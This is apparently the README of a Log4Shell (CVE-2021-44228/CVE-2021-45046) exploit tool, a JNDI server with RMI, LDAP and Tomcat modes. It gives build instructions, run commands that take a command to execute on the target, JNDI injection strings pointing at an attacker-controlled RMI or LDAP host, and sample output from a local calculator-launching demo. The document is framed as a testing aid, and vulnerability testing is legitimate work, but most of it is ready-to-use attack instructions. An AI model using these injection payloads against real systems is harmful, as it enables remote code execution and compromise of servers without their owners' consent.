This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities.
- Load the project on Intellij Idea
- Select JDK in "Projects Settings" (CTRL + ALT + SHIFT + S)
- In "Project Settings", create the Artifact -> "Artifacts" -> "Create JAR from Modules" -> In "JAR files from libraries", mark "extract to target JAR" -> "OK"
- Build Project (CTRL + F9). This will create the jar file in /out/artifacts/ folder
Requires Java 1.8+ and Maven 3.x+
mvn clean package -DskipTests
- You will find the .jar file in /target folder
java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>
You don't need to host the Exploit.class anymore. The app will start an HTTP server on the indicated port.
You must indicate the command you want to run in the target.
Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}
java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>
You don't need to host the Exploit.class anymore. The app will start an HTTP server on the indicated port.
You must indicate the command you want to run in the target.
Injection: {jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}
java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>
Injection: {jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- Starting RMI Server for Tomcat -
- Creating RMI Server on port 1389 -
- Reference bound! -
- RMI server started at 127.0.0.1:1389 -
- Log4J Injection Path: ${jndi:rmi://127.0.0.1:1389/Foo} -